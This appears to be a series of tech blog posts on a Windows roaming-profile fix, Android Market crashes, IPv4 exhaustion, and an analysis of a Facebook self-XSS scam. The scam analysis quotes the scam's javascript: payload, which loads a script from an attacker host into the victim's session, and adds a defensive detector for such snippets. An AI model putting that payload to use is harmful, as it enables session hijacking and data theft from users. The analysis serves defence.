Roaming Profiles: From Windows XP to Vista / Windows 7


Quick, short post today, but this will probably save you a lot of time searching for a pretty much non-existent answer to a new “feature” introduced in roaming profiles for Windows Vista and Windows 7. It cost me an hour to figure this out. Hopefully you’ll see this and solve the issue in a jiffy…

SCENARIO:
You join your brand new Vista or Win7 machines to your domain and then try logging in with a roaming user account, and you get a popup notification error saying that Windows has logged you in with a temporary profile. You look in the event viewer and see the following:

All the permissions are set correctly for the share and folders for the roaming profile and the user can create files in the roaming profile folder, but the stupid “Access Denied” error message is still there.

SOLUTION:
Your roaming profile path MUST have a trailing slash at the end now… Likewise:

What the hell, Microsoft? All along you’ve been lax (*nix had this enforced all along) and now you change it. At least let us know? Please and thank you…

On a slightly different note, I also suggest that you set the following Group Policies to make your sysadmin life easier:
Computer Config\Policies\Administrative Templates\System\Logon --> Always wait for network at computer startup and logon [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Add the Administrators security group to the roaming user profile share [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Wait for remote user profile --> [Enabled]

As usual, cheers.

Facebook Security: An Old Phishing Trick, Revived & Analyzed.


In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link gets posted on their wall asking them to click a fake link in order to gain access to some “cool” feature such as getting a free iPad, gaining access to and seeing other people’s hidden profile information, or getting free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line of JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a link sent to you, either by e-mail, and/or posted on your wall. It looks something like this:


The link posted takes you to a Facebook page that looks like this:


In this particular Facebook page, it redirects you to a 3rd party domain (kkpj.info), which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:


This second Facebook page looks like this:


And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to load and execute whatever script lives at g2ds.info/d.php. Because it is injected into the page you are already logged in to, that script runs with access to your current Facebook session: most prominently your friends list, but it can also read your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.

A few other interesting notes:

    kkpj.info’s index page simply redirects the user to the second Facebook page via JavaScript.
    Both kkpj.info and g2ds.info have the same IP address (50.22.91.42), are registered through eNom, Inc, and are hosted by hostgator.com, as evidenced by their nameservers, NS2767.HOSTGATOR.COM and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevents identifying details from being revealed.
    g2ds.info is the actual domain where the malicious scripts are run from.
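Here is an added example (my own code, not part of the original post) of the kind of check a support or security team can run over a string before a user pastes it into the address bar: it recognises the javascript: scheme, finds the remote script host the snippet would load, and compares it against an assumed allow-list of the site’s own domains. The input is the de-fanged payload quoted above; TRUSTED_HOSTS is a constructed placeholder list.

```javascript
// Added example: classify a pasted "profile viewer" self-XSS snippet and pull
// out the host it loads code from, so it can be blocked/reported.

// The de-fanged payload quoted in the post, used here as sample input.
const PASTED_PAYLOAD =
  'javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script))' +
  '.src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) ' +
  '/* FACEBOOK PROFILE VIEWERS */';

// Assumed allow-list of hosts the site legitimately loads script from (placeholder).
const TRUSTED_HOSTS = ['facebook.com', 'fbcdn.net'];

function isTrustedHost(host) {
  return TRUSTED_HOSTS.some(t => host === t || host.endsWith('.' + t));
}

function analyzePastedUrl(text) {
  // Strip /* ... */ comments: they are only there to make the snippet look official.
  const stripped = text.replace(/\/\*[\s\S]*?\*\//g, ' ').trim();
  const isJavascriptUrl = /^\s*javascript\s*:/i.test(stripped);

  // Look for ".src=" pointing at an absolute or protocol-relative ("//host") URL.
  const srcRe = /\.src\s*=\s*['"]?(?:https?:)?\/\/([a-z0-9.-]+)/gi;
  const hosts = [];
  let m;
  while ((m = srcRe.exec(stripped)) !== null) hosts.push(m[1].toLowerCase());

  // Dynamic <script> injection is the tell-tale of the remote-loader pattern.
  const injectsScriptTag =
    /createElement\s*\(\s*['"]?script['"]?\s*\)/i.test(stripped) &&
    /appendChild/.test(stripped);

  const externalHosts = [...new Set(hosts.filter(h => !isTrustedHost(h)))];
  return {
    isJavascriptUrl,
    loadsRemoteScript: isJavascriptUrl && injectsScriptTag && hosts.length > 0,
    externalHosts,
    verdict: isJavascriptUrl && externalHosts.length > 0
      ? 'self-XSS: loads script from untrusted host'
      : 'no untrusted remote script load detected',
  };
}

console.log(analyzePastedUrl(PASTED_PAYLOAD));
```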


Android Market 2.3 Force Close / Crash


I was stumped by this issue for a long time and was only recently able to find the solution using the Android SDK’s “adb logcat” function to reveal the system logs.

Essentially, you try to install or update an app from the Android Market, and it crashes with a force close message. Reading around on the forums over at xda-developers.com and other places suggests the following:

Proposed Solution #1
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Uninstall” to uninstall updates, essentially roll back the version to the one that came with your ROM.

Proposed Solution #2
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Clear Data” and “Clear Cache”

Proposed Solution #3 (mainly for CyanogenMod or ROMs that don’t come with the Google apps installed)
Boot into recovery and reinstall the gapps zip file.

Proposed Solution #4
Search for the Market app’s apk file and install it using “adb install -r appname.apk”. Make sure you have Settings -> Applications -> Install from Unknown Sources enabled.

Proposed Solution #5
Wipe all data / factory reset. Obviously #sadface. Or #angryface.

I tried all of the suggested solutions above, except the full reset. Obviously the fix should be something that doesn’t require that drastic of a change… but none of the other solutions worked. So I turned on USB debugging, ran “adb logcat”, and then reproduced the Market force close / crash. Deep in the hundreds of lines of log output, I found this:

E/AndroidRuntime( 2975): FATAL EXCEPTION: Download Service
E/AndroidRuntime( 2975): java.lang.SecurityException: Requires VIBRATE permission

What the hell? Yes, I thought the same thing… Why does the Market require vibrate permissions? For notifications, maybe… but even more interesting is the fact that the vibrate permission is required by com.android.media (the music player), which force closes before the Market app does.

The solution? I had a profile that turned vibrations off for the default “Media” apps group (by default it only has the Music app in it). Switching it to “No override” fixed the crashing / force close issue in a jiffy.

What’s up with this funky fix? And why does the Android Market need to call the Music app with vibrate permissions? Beats me… too bad Google’s apps are closed source.

EDIT: Known affected Market versions (by me), as of writing: 2.3.2, 2.3.3, 2.3.4.

Updates!!! March 23, 2011


Long time no see?

Just wanted to write this post to keep you guys updated on a few behind the scenes things…

1.) New domain :: dmach.net. Everything that was available from darwin-mach.net is now on dmach.net, which should be regarded as the primary domain for all transactions. It’s shorter and much cleaner to use. In other words, please update your bookmarks, RSS feeds, etc.

2.) Mach Technologies :: The entire MTI website has been redesigned, including the client area. Give it a spin: http://www.machtechcorp.net.

3.) “Bye Maemo, Hello Android!” :: I recently got an Android phone. Feel free to ask me Android questions – as a matter of fact, the next post is an Android tip.

I’ve also heard requests for video tutorials on some tech stuff? Let me know in the comments below…

IPv4 Addresses Run Dry: Let the mayhem begin!


The last 5 blocks of the IPv4 addresses were given away this morning to Regional Internet Registries so they can assign them. But once they run out, which would be very soon, it’s game over for IPv4 operations, since no new hosts would be able to connect publicly. IPv6 adoption? So small that most consumer products out there still don’t support it. Also because almost all ISPs out there don’t provide it, or if they do, it’s just beginning as a “trial”.

Source: http://arstechnica.com/tech-policy/news/2011/02/river-of-ipv4-addresses-officially-runs-dry.ars